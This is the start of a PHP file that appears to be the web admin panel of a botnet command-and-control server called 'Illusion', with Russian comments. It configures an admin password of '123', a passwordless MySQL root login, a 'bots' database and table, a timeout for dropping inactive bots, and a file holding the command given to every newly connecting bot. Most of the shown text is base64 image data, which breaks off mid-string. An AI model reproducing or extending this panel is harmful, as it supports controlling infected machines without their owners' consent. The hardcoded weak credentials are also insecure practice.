<?php

/*

Illusion WEB-Admin Script

*/

/* пароль доступа к админке */
$password = "123";

/* MySQL */
$mysql_host = "localhost";
$mysql_user = "root";
$mysql_password = "";

/* имя БД */
$mysql_dbname = "bots";

/* имя таблицы */
$mysql_bots_table = "bots";

/* время удаление неактивным ботов.. ставьте чуть больше чем в боте */
$refreshtime = 915;

/* файл, где будет храниться команда для всех новых (приходящих ботов) */
$newcmdfile = "command4new.txt";

/*
-------------------------------------------------------------------------------------------------
*/

$img1 =
"/9j/4AAQSkZJRgABAgEASABIAAD/4QNuRXhpZgAATU0AKgAAAAgABwESAAMAAAABAAEAAAEaAAUAAAABAAAAYgEbAAUAAAABAAAAagEoAAMAAAABAAMAAAExAAIAAAAUAAAAcgEyAAIAAAAUAAAAhodpAAQAAAABAAAAnAAAAMgAAAAcAAAAAQAAABwAAAABQWRvYmUgUGhvdG9zaG9wIDcuMAAyMDA2OjAyOjAzIDE2OjE2OjIzAAAAAAOgAQADAAAAAf//AACgAgAEAAAAAQAAAEagAwAEAAAAAQAAAAoAAAAAAAAABgEDAAMAAAABAAYAAAEaAAUAAAABAAABFgEbAAUAAAABAAABHgEoAAMAAAABAAIAAAIBAAQAAAABAAABJgICAAQAAAABAAACQAAAAAAAAABIAAAAAQAAAEgAAAAB/9j/4AAQSkZJRgABAgEASABIAAD/7QAMQWRvYmVfQ00AAv/uAA5BZG9iZQBkgAAAAAH/2wCEAAwICAgJCAwJCQwRCwoLERUPDAwPFRgTExUTExgRDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwBDQsLDQ4NEA4OEBQODg4UFA4ODg4UEQwMDAwMEREMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDP/AABEIAAoARgMBIgACEQEDEQH/3QAEAAX/xAE/AAABBQEBAQEBAQAAAAAAAAADAAECBAUGBwgJCgsBAAEFAQEBAQEBAAAAAAAAAAEAAgMEBQYHCAkKCxAAAQQBAwIEAgUHBggFAwwzAQACEQMEIRIxBUFRYRMicYEyBhSRobFCIyQVUsFiMzRygtFDByWSU/Dh8WNzNRaisoMmRJNUZEXCo3Q2F9JV4mXys4TD03Xj80YnlKSFtJXE1OT0pbXF1eX1VmZ2hpamtsbW5vY3R1dnd4eXp7fH1+f3EQACAgECBAQDBAUGBwcGBTUBAAIRAyExEgRBUWFxIhMFMoGRFKGxQiPBUtHwMyRi4XKCkkNTFWNzNPElBhaisoMHJjXC0kSTVKMXZEVVNnRl4vKzhMPTdePzRpSkhbSVxNTk9KW1xdXl9VZmdoaWprbG1ub2JzdHV2d3h5ent8f/2gAMAwEAAhEDEQA/AO+ThMnUrGuFIJgnCCWQThME4QKWQTpgnQUukkkkp//Z/+0IDFBob3Rvc2hvcCAzLjAAOEJJTQQlAAAAAAAQAAAAAAAAAAAAAAAAAAAAADhCSU0D7QAAAAAAEABIAAAAAgACAEgAAAACAAI4QklNBCYAAAAAAA4AAAAAAAAAAAAAP4AAADhCSU0EDQAAAAAABAAAAHg4QklNBBkAAAAAAAQAAAAeOEJJTQPzAAAAAAAJAAAAAAAAAAABADhCSU0ECgAAAAAAAQAAOEJJTScQAAAAAAAKAAEAAAAAAAAAAjhCSU0D9QAAAAAASAAvZmYAAQBsZmYABgAAAAAAAQAvZmYAAQChmZoABgAAAAAAAQAyAAAAAQBaAAAABgAAAAAAAQA1AAAAAQAtAAAABgAAAAAAAThCSU0D+AAAAAAAcAAA/////////////////////////////wPoAAAAAP////////////////////////////8D6AAAAAD/////////////////////////////A+gAAAAA/////////////////////////////wPoAAA4QklNBAgAAAAAABAAAAABAAACQAAAAkAAAAAAOEJJTQQeAAAAAAAEAAAAADhCSU0EGgAAAAADSwAAAAYAAAAAAAAAAAAAAAoAAABGAAAACwQRBDUENwAgBDgEPAQ1BD0EOAAtADIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAEYAAAAKAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAEAAAAAAABudWxsAAAAAgAAAAZib3VuZHNPYmpjAAAAAQAAAAAAAFJjdDEAAAAEAAAAAFRvcCBsb25nAAAAAAAAAABMZWZ0bG9uZwAAAAAAAAAAQnRvbWxvbmcAAAAKAAAAAFJnaHRsb25nAAAARgAAAAZzbGljZXNWbExzAAAAAU9iamMAAAABAAAAAAAFc2xpY2UAAAASAAAAB3NsaWNlSURsb25nAAAAAAAAAAdncm91cElEbG9uZwAAAAAAAAAGb3JpZ2luZW51bQAAAAxFU2xpY2VPcmlnaW4AAAANYXV0b0dlbmVyYXRlZAAAAABUeXBlZW51bQAAAApFU2xpY2VUeXBlAAAAAEltZyAAAAAGYm91bmRzT2JqYwAAAAEAAAAAAABSY3QxAAAABAAAAABUb3AgbG9uZwAAAAAA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ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8P3hwYWNrZXQgZW5kPSd3Jz8+/+4ADkFkb2JlAGRAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAwMDAwMDAwMDAwEBAQEBAQEBAQEBAgIBAgIDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMD/8AAEQgACgBGAwERAAIRAQMRAf/dAAQACf/EAaIAAAAGAgMBAAAAAAAAAAAAAAcIBgUECQMKAgEACwEAAAYDAQEBAAAAAAAAAAAABgUEAwcCCAEJAAoLEAACAQMEAQMDAgMDAwIGCXUBAgMEEQUSBiEHEyIACDEUQTIjFQlRQhZhJDMXUnGBGGKRJUOhsfAmNHIKGcHRNSfhUzaC8ZKiRFRzRUY3R2MoVVZXGrLC0uLyZIN0k4Rlo7PD0+MpOGbzdSo5OkhJSlhZWmdoaWp2d3h5eoWGh4iJipSVlpeYmZqkpaanqKmqtLW2t7i5usTFxsfIycrU1dbX2Nna5OXm5+jp6vT19vf4+foRAAIBAwIEBAMFBAQEBgYFbQECAxEEIRIFMQYAIhNBUQcyYRRxCEKBI5EVUqFiFjMJsSTB0UNy8BfhgjQlklMYY0TxorImNRlUNkVkJwpzg5NGdMLS4vJVZXVWN4SFo7PD0+PzKRqUpLTE1OT0laW1xdXl9ShHV2Y4doaWprbG1ub2Z3eHl6e3x9fn90hYaHiImKi4yNjo+DlJWWl5iZmpucnZ6fkqOkpaanqKmqq6ytrq+v/aAAwDAQACEQMRAD8A260/331/33Psfmnp0CBx6mx/Xn/Yfj/H22erjAHU+L8f77/X/Bt7aOOnR69OUQ+h/wBb+v8Asf8AYe2W6dX7MdOkP++/2P8ArD2y2enR06Q/0/w9tN06OnKL8e2T06OnCP8AH/E8/wC++vtonp1fn1K40/j/AH3+wv7pXPVvy6//0NupP99/tvx7H56BHU1Px/xH+x9tnq449OEX/Ffp/sfp7aPn06vHy6cofx/rj/W/5H7abz6dTy6dIfqP98Px/vHthunV4Dp0h/H+sfp/xPtpuPT68Pz6cov9h/vv6f4/19snq6/5OnBPqP8AX/33/G/bZ4Hp0dSv9t9P+J/H+H/Ee2/Xqw4Hr//Z";
$img2 =
"/9j/4AAQSkZJRgABAgEASABIAAD/4QNoRXhpZgAATU0AKgAAAAgABwESAAMAAAABAAEAAAEaAAUAAAABAAAAYgEbAAUAAAABAAAAagEoAAMAAAABAAMAAAExAAIAAAAUAAAAcgEyAAIAAAAUAAAAhodpAAQAAAABAAAAnAAAAMgAAAAcAAAAAQAAABwAAAABQWRvYmUgUGhvdG9zaG9wIDcuMAAyMDA2OjAyOjAzIDE1OjMyOjQxAAAAAAOgAQADAAAAAf//AACgAgAEAAAAAQAAAAqgAwAEAAAAAQAAABQAAAAAAAAABgEDAAMAAAABAAYAAAEaAAUAAAABAAABFgEbAAUAAAABAAABHgEoAAMAAAABAAIAAAIBAAQAAAABAAABJgICAAQAAAABAAACOgAAAAAAAABIAAAAAQAAAEgAAAAB/9j/4AAQSkZJRgABAgEASABIAAD/7QAMQWRvYmVfQ00AAv/uAA5BZG9iZQBkgAAAAAH/2wCEAAwICAgJCAwJCQwRCwoLERUPDAwPFRgTExUTExgRDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwBDQsLDQ4NEA4OEBQODg4UFA4ODg4UEQwMDAwMEREMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDP/AABEIABQACgMBIgACEQEDEQH/3QAEAAH/xAE/AAABBQEBAQEBAQAAAAAAAAADAAECBAUGBwgJCgsBAAEFAQEBAQEBAAAAAAAAAAEAAgMEBQYHCAkKCxAAAQQBAwIEAgUHBggFAwwzAQACEQMEIRIxBUFRYRMicYEyBhSRobFCIyQVUsFiMzRygtFDByWSU/Dh8WNzNRaisoMmRJNUZEXCo3Q2F9JV4mXys4TD03Xj80YnlKSFtJXE1OT0pbXF1eX1VmZ2hpamtsbW5vY3R1dnd4eXp7fH1+f3EQACAgECBAQDBAUGBwcGBTUBAAIRAyExEgRBUWFxIhMFMoGRFKGxQiPBUtHwMyRi4XKCkkNTFWNzNPElBhaisoMHJjXC0kSTVKMXZEVVNnRl4vKzhMPTdePzRpSkhbSVxNTk9KW1xdXl9VZmdoaWprbG1ub2JzdHV2d3h5ent8f/2gAMAwEAAhEDEQA/APQfsT0vsb/BaiSdxFHCH//Q9VSXyqkkp//Z/+0IJlBob3Rvc2hvcCAzLjAAOEJJTQQlAAAAAAAQAAAAAAAAAAAAAAAAAAAAADhCSU0D7QAAAAAAEABIAAAAAgACAEgAAAACAAI4QklNBCYAAAAAAA4AAAAAAAAAAAAAP4AAADhCSU0EDQAAAAAABAAAAHg4QklNBBkAAAAAAAQAAAAeOEJJTQPzAAAAAAAJAAAAAAAAAAABADhCSU0ECgAAAAAAAQAAOEJJTScQAAAAAAAKAAEAAAAAAAAAAjhCSU0D9QAAAAAASAAvZmYAAQBsZmYABgAAAAAAAQAvZmYAAQChmZoABgAAAAAAAQAyAAAAAQBaAAAABgAAAAAAAQA1AAAAAQAtAAAABgAAAAAAAThCSU0D+AAAAAAAcAAA/////////////////////////////wPoAAAAAP////////////////////////////8D6AAAAAD/////////////////////////////A+gAAAAA/////////////////////////////wPoAAA4QklNBAAAAAAAAAIAADhCSU0EAgAAAAAAAgAAOEJJTQQIAAAAAAAfAAAAAQAAAkAAAAJAAAAAAwAAAYQBAAACCAEAAAJUAQA4QklNBB4AAAAAAAQAAAAAOEJJTQQaAAAAAAM/AAAABgAAAAAAAAAAAAAAFAAAAAoAAAAFAGIALgBqAHAAZwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAACgAAABQAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAG51bGwAAAACAAAABmJvdW5kc09iamMAAAABAAAAAAAAUmN0MQAAAAQAAAAAVG9wIGxvbmcAAAAAAAAAAExlZnRsb25nAAAAAAAAAABCdG9tbG9uZwAAABQAAAAAUmdodGxvbmcAAAAKAAAABnNsaWNlc1ZsTHMAAAABT2JqYwAAAAEAAAAAAAVzbGljZQAAABIAAAAHc2xpY2VJRGxvbmcAAAAAAAAAB2dyb3VwSURsb25nAAAAAAAAAAZvcmlnaW5lbnVtAAAADEVTbGljZU9yaWdpbgAAAA1hdXRvR2VuZXJhdGVkAAAAAFR5cGVlbnVtAAAACkVTbGljZVR5cGUAAAAASW1nIAAAAAZib3VuZHNPYmpjAAAAAQAAAAAA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ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC